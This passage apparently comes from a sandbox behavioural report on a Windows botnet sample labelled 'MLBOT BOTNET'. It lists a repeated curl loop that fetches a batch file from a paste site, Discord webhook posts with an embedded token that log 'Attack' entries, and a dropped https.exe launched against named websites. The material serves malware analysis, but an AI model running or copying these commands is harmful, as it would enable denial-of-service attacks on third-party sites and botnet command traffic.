  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2276
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https https://www.jokey.com/ 36000 50 {}\", \"description\": \" Fri 08/18/2023-50 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:1676
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe https://www.jokey.com/ 50
      4⤵
      Executes dropped EXE
      PID:3432
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3388
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4300
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1940
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3464
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:5088
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4660
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1540
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2032
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:680
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4312
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:936
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2496
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3368
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:5008
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1896
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:404
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3172
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2284
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2428
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4324
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4960
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3908
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:728
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4436
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1428
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3928
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:5104
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1644
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2096
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1648
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:692
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3616
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4764
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1356
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:868
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4144
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1656
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4732
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3712
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3816
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1288
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1328
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1752
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2912
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:220
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1180
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4016
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3964
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2904
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4444
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4076
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4428
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2900
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2920
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4988
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:388
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3000
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3824
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1468
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2916
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2988
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3444
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4936
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1136
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4260
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4780
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1124
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:468
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2656
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3684
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1376
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4252
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3152
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2068
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1624
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2396
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2948
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:224
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4232
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3804
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2852
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:724
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4340
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:756
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1852
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1836
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2288
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1772
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2424
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3632
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2188
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1776
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1116
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2344
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4644
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1052
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3496
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3460
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:5028
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3548
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:460
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:960
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4312
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:936
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4268
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2636
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4012
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4920
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4440
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2604
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1912
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3216
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2428
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2024
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1864
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4072
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1640
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3600
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3864
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4832
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4908
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3312
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4148
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2612
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2552
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:5084
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3540
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1616
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1356
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3100
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4880
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4196
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1016
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4008
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3896
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3212
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4504
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4888
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2232
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4596
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1180
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4204
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1080
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3304
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4448
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2040
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3168
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4264
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:696
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1156
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3664
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4240
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1780
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4836
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:388
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3000
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3196
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4896
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2436
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4336
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2388
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4904
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1136
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4260
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:444
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3720
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3680
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3520
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1832
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1412
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4252
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:712
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3084
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:32
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1624
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4392
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1200
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4956
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4192
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4520
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2072
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3284
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2852
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3400
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:64
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2260
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4424
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3788
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4140
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2188
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1548
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4184
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4300
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1856
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:376
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:216
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3984
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4120
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1936
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4576
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1884
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4320
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1184
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3644
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1800
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4612
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4452
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1896
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4920
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4440
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4308
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:5112
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2400
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https https://casinomarriott.com/ 36000 60 {}\", \"description\": \" Fri 08/18/2023-60 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:1108
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe https://casinomarriott.com/ 60
      4⤵
      Executes dropped EXE
      PID:1620
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4672
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3056
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:852
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2396
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:236
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4224
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4232
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3948
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1268
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4748
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1420
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2576
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4692
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4852
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4184
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1120
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3984
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3332
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1936
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4188
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1884
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4312
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4156
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2736
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:412
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1416
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4568
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:912
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3616
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3916
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4132
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4828
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4872
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4512
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4732
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2520
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3712
  - - C:\Windows\system32\curl.exe
